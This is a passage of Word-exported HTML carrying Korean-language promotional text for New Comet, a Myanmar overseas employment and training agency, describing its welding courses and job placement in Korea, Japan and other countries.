style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">이상&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">종사해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">명 이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">쌍둥이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">부처로부터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">받고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">작업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">동안</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">명</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는 현재에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">한국</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">조선소들에 일하고 싶은 미얀마</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">각지에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">온</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">소수민족</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">형제들을 교통통신부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">산하</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike)</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">조선소에 트레이너들와 함께 훌령한 기능공이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">되도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">용접수업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있으며</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취업할 수 있게 취업들을 연계시키고 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">싱가포</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본 같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">국가에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">청년들에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">미얀마의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">치누들이 일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">개발한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">첨단</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기술을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">배우고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">꿈을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">실현할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본으로 취업비자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">연수비자로 가기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" 